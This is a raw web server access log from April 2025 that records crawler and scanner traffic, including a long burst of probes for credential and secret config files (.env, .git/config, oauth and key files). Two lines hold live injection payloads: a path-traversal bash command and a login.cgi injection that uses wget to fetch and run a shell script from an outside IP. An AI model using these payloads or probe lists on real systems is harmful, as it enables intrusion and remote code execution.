45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config/service_auth.json HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config/app_config.yaml HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config.js HTTP/1.1" 404 284 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /project/settings.py HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /microservices/oauth/config.json HTTP/1.1" 404 298 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /app/auth/config.json HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config/okta_oauth.yaml HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config/settings.json HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /secrets/token_store.yaml HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /services/auth/config.json HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config/twitter_auth.yaml HTTP/1.1" 404 295 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /test/settings.yaml HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /etc/oauth/config.json HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config/server_auth.yaml HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /application.yml HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config/production.json HTTP/1.1" 404 293 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:58 +0200] "GET /config/github.yaml HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /config/microsoft.json HTTP/1.1" 404 293 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /settings/api_config.json HTTP/1.1" 404 295 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /config/integration.json HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /app/settings/auth.json HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /settings/service_keys.ini HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /config/initializers/oauth.rb HTTP/1.1" 404 298 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /src/config/settings.yaml HTTP/1.1" 404 295 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /usr/src/app/auth.json HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /config/aws.json HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /config/gcp_oauth.json HTTP/1.1" 404 293 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /config/oauth.json HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /config/auth.yaml HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /config/api.json HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /auth/oauth_config.ini HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /settings.json HTTP/1.1" 404 286 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /src/main/resources/application.yml HTTP/1.1" 404 300 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /config/database.yml HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /scripts/config.json HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:05:59 +0200] "GET /settings/base.ini HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /config/external_auth.json HTTP/1.1" 404 296 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /security/oauth.json HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /config/dev_config.ini HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /config/google.json HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /app/config/oauth.json HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /tests/config/test_oauth.json HTTP/1.1" 404 295 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /config/base.json HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /config/client_oauth.json HTTP/1.1" 404 295 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /vault/oauth.yaml HTTP/1.1" 404 288 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /auth/config.json HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /auth/settings.yaml HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /security/auth_settings.yaml HTTP/1.1" 404 296 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /security/keys.json HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /config/development.json HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /services/user/settings.yaml HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /spec/config/oauth.yaml HTTP/1.1" 404 293 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /cloud/settings.yaml HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:00 +0200] "GET /conf.d/oauth.conf HTTP/1.1" 404 287 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:01 +0200] "GET /config/db.json HTTP/1.1" 404 287 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:01 +0200] "GET /etc/auth/secrets.yaml HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:01 +0200] "GET /auth/keys.ini HTTP/1.1" 404 286 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:01 +0200] "GET /security/api_settings.json HTTP/1.1" 404 296 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:01 +0200] "GET /secrets/secrets.json HTTP/1.1" 404 287 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:01 +0200] "GET /vault/config.json HTTP/1.1" 404 290 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:01 +0200] "GET /config.ini HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:01 +0200] "GET /application.properties HTTP/1.1" 404 292 "-" "l9explore/1.2.2"
45.148.10.35 - - [10/Apr/2025:22:06:01 +0200] "GET /config/facebook_oauth.json HTTP/1.1" 404 297 "-" "l9explore/1.2.2"
151.106.166.243 - - [10/Apr/2025:22:08:16 +0200] "GET /download/file.php?id=250&sid=5e5f8b24256a5cda8ea35aedc7efbb6f HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.166.243 - - [10/Apr/2025:22:08:17 +0200] "GET /download/file.php?id=250&sid=5e5f8b24256a5cda8ea35aedc7efbb6f HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.166.243 - - [10/Apr/2025:22:08:17 +0200] "GET /download/file.php?id=250&sid=5e5f8b24256a5cda8ea35aedc7efbb6f HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.135 - - [10/Apr/2025:22:08:39 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11606579.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:22:08:48 +0200] "GET /docs/contadino/2018/RECHNUNG/RE18-00001.pdf HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:22:08:57 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10973070.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.191.138 - - [10/Apr/2025:22:09:53 +0200] "GET /cron.php?cron_type=tidy_cache&sid=81c786b33e75f1f2d072b95b9f6ee604 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:22:09:53 +0200] "GET /cron.php?cron_type=tidy_cache&sid=81c786b33e75f1f2d072b95b9f6ee604 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.191.138 - - [10/Apr/2025:22:09:54 +0200] "GET /cron.php?cron_type=tidy_cache&sid=81c786b33e75f1f2d072b95b9f6ee604 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:22:09:54 +0200] "GET /cron.php?cron_type=tidy_sessions&sid=32605fdcab0e52cc5f1f29da094804bf HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:22:09:55 +0200] "GET /cron.php?cron_type=tidy_sessions&sid=32605fdcab0e52cc5f1f29da094804bf HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:22:09:55 +0200] "GET /cron.php?cron_type=tidy_sessions&sid=32605fdcab0e52cc5f1f29da094804bf HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.35 - - [10/Apr/2025:22:14:33 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.177.184 - - [10/Apr/2025:22:15:00 +0200] "GET /cron.php?cron_type=tidy_cache&sid=98381bc919a9e83fcbe7080d93281923 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.177.184 - - [10/Apr/2025:22:15:01 +0200] "GET /cron.php?cron_type=tidy_cache&sid=98381bc919a9e83fcbe7080d93281923 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.177.184 - - [10/Apr/2025:22:15:01 +0200] "GET /cron.php?cron_type=tidy_cache&sid=98381bc919a9e83fcbe7080d93281923 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [10/Apr/2025:22:15:01 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4ce8b423c63db69c74ca3c0db2c35b68 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [10/Apr/2025:22:15:01 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4ce8b423c63db69c74ca3c0db2c35b68 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [10/Apr/2025:22:15:02 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4ce8b423c63db69c74ca3c0db2c35b68 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [10/Apr/2025:22:16:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [10/Apr/2025:22:18:41 +0200] "GET /docs/contadino/2018/RECHNUNG/RE18-00005.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:22:18:50 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11125039.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:22:18:58 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12304834.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.10 - - [10/Apr/2025:22:24:31 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.163.240 - - [10/Apr/2025:22:24:48 +0200] "GET /cron.php?cron_type=tidy_cache&sid=96b32076f086e96baf59a162f1a860e1 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [10/Apr/2025:22:24:48 +0200] "GET /cron.php?cron_type=tidy_cache&sid=96b32076f086e96baf59a162f1a860e1 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.240 - - [10/Apr/2025:22:24:49 +0200] "GET /cron.php?cron_type=tidy_cache&sid=96b32076f086e96baf59a162f1a860e1 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.214 - - [10/Apr/2025:22:26:01 +0200] "GET /download/file.php?id=256&sid=9606e61269ab56c0da3b0cbd35a27e56 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.214 - - [10/Apr/2025:22:26:02 +0200] "GET /download/file.php?id=256&sid=9606e61269ab56c0da3b0cbd35a27e56 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.214 - - [10/Apr/2025:22:26:02 +0200] "GET /download/file.php?id=256&sid=9606e61269ab56c0da3b0cbd35a27e56 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [10/Apr/2025:22:26:44 +0200] "GET /cron.php?cron_type=tidy_cache&sid=c9567c1f8db6602f9359da2fcd8dabf3 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [10/Apr/2025:22:26:44 +0200] "GET /cron.php?cron_type=tidy_cache&sid=c9567c1f8db6602f9359da2fcd8dabf3 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [10/Apr/2025:22:26:45 +0200] "GET /cron.php?cron_type=tidy_cache&sid=c9567c1f8db6602f9359da2fcd8dabf3 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
87.121.84.209 - - [10/Apr/2025:22:30:15 +0200] "GET /?UrkCEO/edit&theme=margot&squelette=../../../../../../../..//bin/bash%20-c%20%27ping%20-c%201%2031.15.17.163%27&style=margot.css HTTP/1.1" 200 274 "-" "Mozilla/5.0"
154.81.156.54 - - [10/Apr/2025:22:37:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.132.91 - - [10/Apr/2025:22:40:39 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [10/Apr/2025:22:43:03 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11133586.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:22:43:11 +0200] "GET /docs/contadino/2017/GS17-000005.pdf HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:22:43:21 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10745064.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:22:43:29 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12468766.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:22:43:39 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11912200.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
161.35.156.179 - - [10/Apr/2025:22:47:00 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
161.35.156.179 - - [10/Apr/2025:22:47:00 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
156.59.198.135 - - [10/Apr/2025:22:51:47 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12033318.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:22:51:56 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11125030.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:22:52:04 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11757929.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:22:52:13 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12030780.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:22:52:22 +0200] "GET /docs/contadino/2018/RECHNUNG/RE18-00017.pdf HTTP/1.0" 404 309 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:22:52:31 +0200] "GET /renault.activities.at/htdocs/binaries/10017492.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.165.16.166 - - [10/Apr/2025:22:55:37 +0200] "\x03" 400 383 "-" "-"
156.59.198.136 - - [10/Apr/2025:23:00:37 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11044898.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:23:00:46 +0200] "GET /docs/contadino/2018/RECHNUNG/RE18-00016.pdf HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Apr/2025:23:02:01 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10961122.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.181.25 - - [10/Apr/2025:23:04:35 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=115&sid=8d282303ddc0f32e383aae10a67190e9 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [10/Apr/2025:23:04:35 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=115&sid=8d282303ddc0f32e383aae10a67190e9 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [10/Apr/2025:23:04:35 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=115&sid=8d282303ddc0f32e383aae10a67190e9 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.54 - - [10/Apr/2025:23:05:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.160.158 - - [10/Apr/2025:23:09:56 +0200] "GET /cron.php?cron_type=tidy_cache&sid=c8f48e79d33a397c76a8268391778865 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:23:09:57 +0200] "GET /cron.php?cron_type=tidy_cache&sid=c8f48e79d33a397c76a8268391778865 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.160.158 - - [10/Apr/2025:23:09:57 +0200] "GET /cron.php?cron_type=tidy_cache&sid=c8f48e79d33a397c76a8268391778865 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.35 - - [10/Apr/2025:23:10:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.121.133.117 - - [10/Apr/2025:23:16:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
154.81.156.54 - - [10/Apr/2025:23:21:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.132.84 - - [10/Apr/2025:23:25:39 +0200] "\x16\x03\x01" 400 383 "-" "-"
147.185.132.84 - - [10/Apr/2025:23:25:39 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.34 - - [10/Apr/2025:23:31:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.166.60 - - [10/Apr/2025:23:43:16 +0200] "GET /download/file.php?id=250&sid=669dcccb4fff914fd75ea914085b5814 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.166.60 - - [10/Apr/2025:23:43:16 +0200] "GET /download/file.php?id=250&sid=669dcccb4fff914fd75ea914085b5814 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.166.60 - - [10/Apr/2025:23:43:16 +0200] "GET /download/file.php?id=250&sid=669dcccb4fff914fd75ea914085b5814 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [10/Apr/2025:23:46:34 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12304896.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Apr/2025:23:46:43 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12322797.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
